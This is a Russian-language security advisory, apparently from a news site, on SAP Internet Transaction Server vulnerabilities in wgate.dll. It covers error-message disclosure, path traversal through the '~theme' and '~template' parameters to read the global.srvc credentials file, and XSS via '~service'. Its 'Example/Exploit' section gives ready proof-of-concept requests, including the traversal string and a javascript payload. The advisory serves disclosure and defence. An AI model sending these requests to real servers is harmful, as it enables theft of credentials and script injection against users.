Программа: SAP Internet Transcaction Server Version 4620.2.0.323011, Build
46B.323011 (win32/IIS 5.0) 

Несколько уязвимостей обнаружено в SAP Internet Transaction Server
(ITS). Удаленный атакующий может раскрыть различную информацию и выполнить
XSS нападение. Все уязвимости обнаружены в "wgate.dll" и связаны с недостаточной
фильтрацией пользовательских данных в the "~service", "~templatelanguage",
"~language", "~theme", и "~template" параметрах. В результате сервер может: 

  • возвратить сообщение об ошибке, в которой содержится системная
    информация об операционной системе, версии программного обеспечения и
    структуре директорий, если представлены некорректные параметры.
  • Раскрыть содержание произвольных файлов, представляя специально
    обработанное значение для "~theme" и "~template" параметров. В результате
    удаленный пользователь может получить доступ к конфигурационному файлу
    "global.srvc", который содержит имя пользователя и шифрованные пароли. 
  • Выполнить XSS нападение, представляя произвольный код сценария в
    параметре "~service". 

Пример/Эксплоит: 
1. 
Http-Request: 
http://www.server.name/scripts/wgate/pbw2/!? 
with params: 
~runtimemode=DM& 
~language=en& 
~theme=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

2. 
Http-Request: 
http://www.server.name/scripts/wgate/pbw2/!? 
with params: 
~language=en& 
~runtimemode=DM& 
~templatelanguage=& 
~language=en& 
~theme=..\..& 
~template=services\global.srvc+++++++++++++++++++ 
+++++++++++++++++++++++++++++++++++++++++++++++++++ 
+++++++++++++++++++++++++++++++++++++++++++++++++++ 
+++++++++++++++++++++++++++++++++++++++++++++++++++ 
++++++++++ 
++ 

3. 
http://www.server.name/scripts/wgate.dll? 
with params: 
~service=--><img%09src=javascript:alert(1)%3bcrap

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии